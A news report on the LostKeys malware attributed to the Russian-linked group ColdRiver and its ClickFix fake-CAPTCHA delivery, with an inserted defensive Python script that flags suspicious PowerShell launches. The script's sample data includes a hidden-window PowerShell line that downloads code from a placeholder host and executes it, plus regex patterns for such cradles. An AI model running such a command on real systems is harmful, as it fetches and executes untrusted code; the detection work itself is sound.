Google has uncovered a new piece of malware named LostKeys, used by the hacker group ColdRiver, which has ties to the Russian FSB. This software is designed to steal information from Western organizations.
According to the Google Threat Intelligence Group (GTIG), LostKeys is delivered through targeted ClickFix attacks that rely on social engineering and begin with a fake CAPTCHA page. Victims are tricked into running a malicious PowerShell script, which downloads and executes further stages. The end goal is to install LostKeys, which operates as a digital vacuum that extracts files and system information. The attackers also deploy other malware, such as SPICA, to gather documents.
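As an added illustration not taken from the GTIG report, the following Python sketch scores constructed process-creation events for the ClickFix pattern described above: PowerShell started interactively (parent explorer.exe, as happens when a user pastes into the Run dialog) with a download-and-execute command line. The indicator strings, field names and sample events are assumptions chosen for the example, not details from the article.

```python
import re

# Generic download-and-execute tokens seen in PowerShell "cradles". These are
# assumed indicators from general practice, not strings quoted from the report.
DOWNLOAD_RE = re.compile(
    r"(iwr|invoke-webrequest|invoke-restmethod|irm|downloadstring|downloadfile"
    r"|net\.webclient|curl\s)", re.I)
EXEC_RE = re.compile(
    r"(\biex\b|invoke-expression|-enc(odedcommand)?\b|-e\s+[A-Za-z0-9+/=]{20,})", re.I)
HIDDEN_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)

# ClickFix lures tell the user to paste into the Run dialog or Explorer address
# bar, both of which launch children under explorer.exe (assumption for the
# sample; align with how your telemetry names parent processes).
USER_LAUNCH_PARENTS = {"explorer.exe"}

def score_event(ev):
    """Return (score, reasons) for one process-creation event dict."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    cmd, score, reasons = ev["cmdline"], 0, []
    checks = [
        (parent in USER_LAUNCH_PARENTS, 1, f"launched interactively via {parent}"),
        (DOWNLOAD_RE.search(cmd) is not None, 2, "download cradle in command line"),
        (EXEC_RE.search(cmd) is not None, 2, "in-memory execution or encoded command"),
        (HIDDEN_RE.search(cmd) is not None, 1, "hidden window or policy bypass"),
    ]
    for hit, weight, reason in checks:
        if hit:
            score += weight
            reasons.append(reason)
    return score, reasons

def flag_clickfix_candidates(events, threshold=4):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append((ev, score, reasons))
    return out

# Constructed sample events (not real telemetry); fields modelled on Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iwr http://lure.invalid/captcha | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"parent": r"C:\Program Files\Jenkins\jenkins.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh -File deploy.ps1"},
]
```

Only the first constructed event crosses the threshold; a benign interactive PowerShell launch scores 1 and a scheduled build job scores 0.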
The ColdRiver group has been active since 2017 and is also tracked under names such as Star Blizzard and Callisto Group. Reports indicate that it has stepped up its activity in recent years, particularly since the start of Russia's invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and NGOs.
The United States has already imposed sanctions against certain members of the group and announced a reward of $10 million for information leading to their capture.
Google experts emphasize the need for stronger cybersecurity, particularly at organizations likely to be targeted by ColdRiver. They recommend enabling Google's advanced protection features and keeping security systems up to date to defend against similar threats.